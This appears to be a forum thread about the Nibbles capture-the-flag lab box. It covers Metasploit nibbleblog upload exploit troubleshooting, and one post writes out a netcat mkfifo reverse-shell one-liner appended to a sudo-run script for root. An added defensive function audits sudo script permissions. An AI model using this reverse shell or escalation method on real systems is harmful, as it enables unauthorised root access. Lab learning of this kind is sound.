Nibbles

@karelchajim said:
Eh, I am really stuck. I tried this box several times now. I crawled website, directories, found out xml with username, but I am not able to guess password. Whatever I tried, I failed. My combos of usr/pwd do not work at all.
Could you please hint me for creds for login page?

nevermind. got it. ■■■

hey bro can you pm hint on password I am stuck same as you at this point

Someone help is it because this server is retired or I am not able to export exploit some getting this error help

Exploit completed, but no session was created.
msf exploit(multi/http/nibbleblog_file_upload) > exploit

[*] Started reverse -----------======
[!] This exploit may require manual cleanup of ‘image.php’ on the target
[*] Exploit completed, but no session was created.
getting

Rooted thank you learned a lot trying to root this machine.

rooted

I am also stuck with same issue, any solution for this?

@it4chi said:
I keep getting ‘This exploit may require manual cleanup of ‘image.php’ on the target’ when I try the nibbleblog exploit. Already tried resetting it, did not help.
Any idea what else I can do

Alright, so I got user easily, but I’m having trouble with root. I feel like I’m literally at the last step. I keep running ******.sh as sudo, but get a ‘command not found’ error every time. What am I missing?

EDIT – Nevermind. R00ted. :wink:

Hey laylow, how did you solve this issue?

@laylow said:

Someone help is it because this server is retired or I am not able to export exploit some getting this error help

Exploit completed, but no session was created.
msf exploit(multi/http/nibbleblog_file_upload) > exploit

[*] Started reverse -----------======
[!] This exploit may require manual cleanup of ‘image.php’ on the target
[*] Exploit completed, but no session was created.
getting

It seems only to be a problem for a few of us running the exploit…
Hope you can help

I rooted this today after having the ‘exploit completed, but no session was created’ problem. I fixed it by typing the following into msfconsole (after selecting the exploit):

set lhost tun0

Simple fix, hopefully works for anyone else who has that problem.


I’ve gone through everyone’s comments who have the problem
Started reverse -----------======
[!] This exploit may require manual cleanup of ‘image.php’ on the target
Exploit completed, but no session was created.

I’ve tried resetting the machine and my vpn connection. I’ve had no luck. I’ve read through the documentation. Idk what I’m doing wrong.

here are my settings on the metasploit too

PASSWORD nibbles yes The password to authenticate with
Proxies no A proxy chain of format type:host:port[,type:host:port][…]
RHOSTS 10.10.10.75 yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI /nibbleblog/ yes The base path to the web application
USERNAME admin yes The username to authenticate with
VHOST no HTTP server virtual host

I’ve done this box last weekend as well. If you use some Google Fu you can find a manual exploitation manual. It is well written on that website. Remember that on your Kali probably the well known pentest monkey is available to use while you are exploiting it manually

fixed my error message thanks!

Finally got it. For me, the key was researching Linux commands that weren’t necessarily covered in the lessons leading up to this (running a php file as sudo). Took way too long, but I feel like I learned a lot along the way!

Just my contribution for something I spent several days on:

On the last part of this Machine, right before executing the final sudo and getting root, I ran into error messages no tty present and no askpass program specified and unknown': I need something more specific when trying to execute sudo /home/nibbler/personal/stuff/monitor.sh

I couldn’t figure out what I was doing wrong, and I even found several write-ups that get the errors and seem to proceed like it’s no big deal.

The issue is I did a dumb thing while following the directions in “Nibbles - Privilege Escalation,” and no doubt you may have as well if you’re looking at this post.

The directions say to edit monitor.sh with echo 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.2 8443 >/tmp/f' | tee -a monitor.sh

If you do that in /home/nibbler, where you likely will be after executing $ unzip personal.zip to get monitor.sh, you will create another monitor.sh with the echo command in /home/nibbler.

You need to go where monitor.sh is properly located, which is /home/nibbler/personal/stuff/monitor.sh, and execute your echo command by editing monitor.sh there.

Then you will be able to sudo /home/nibbler/personal/stuff/monitor.sh and in a separate parrot terminal, nc -lvnp 8443.

Hope this helps. This was my first Machine, and although I learned quite a bit, I also feel it was a stupid mistake to take so much time to learn!
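
The root step in the last post depends on a script under a user's home directory being edited by that user and then run through sudo. As an added example (not from any post in this thread or from the box's materials), here is a defender-side check for that misconfiguration: it walks a sudo-permitted script path and its parent directories and reports anything a non-root account could modify or create. The function name, its arguments and the finding labels are hypothetical, and GNU stat is assumed.

```sh
# Added example: audit a path that sudoers lets a user run as root.
# Assumes GNU stat (Linux); the function name and arguments are hypothetical.
# audit_sudo_target PATH [TRUSTED_UID] [TOP]
#   Checks PATH and each parent directory up to TOP (default /).
#   Prints one finding per line; returns 0 if clean, 1 on findings, 2 on usage error.
audit_sudo_target() {
    local target="$1" trusted="${2:-0}" top="${3:-/}"
    local p uid mode findings=0

    case "$target" in
        /*) ;;
        *) echo "usage: audit_sudo_target /absolute/path [uid] [top]" >&2; return 2 ;;
    esac

    if [ -e "$target" ]; then
        p="$target"
    else
        # A missing target can be created by whoever can write to its directory.
        echo "MISSING $target"
        findings=1
        p=$(dirname -- "$target")
    fi

    while :; do
        if [ -e "$p" ]; then
            uid=$(stat -c %u -- "$p")
            mode=$(stat -c %a -- "$p")
            if [ "$uid" != "$trusted" ]; then
                echo "OWNER $p uid=$uid expected=$trusted"
                findings=1
            fi
            # Octal mode: a 2, 3, 6 or 7 in the group or other digit means writable.
            case "$mode" in
                *[2367]?|*[2367]) echo "MODE $p mode=$mode is group/other writable"
                                  findings=1 ;;
            esac
        fi
        if [ "$p" = "$top" ] || [ "$p" = "/" ]; then break; fi
        p=$(dirname -- "$p")
    done
    return "$findings"
}
```

Run as root against each script path listed in sudoers with the default trusted UID of 0; any finding on the file or on a parent directory means a non-root account can change what runs as root.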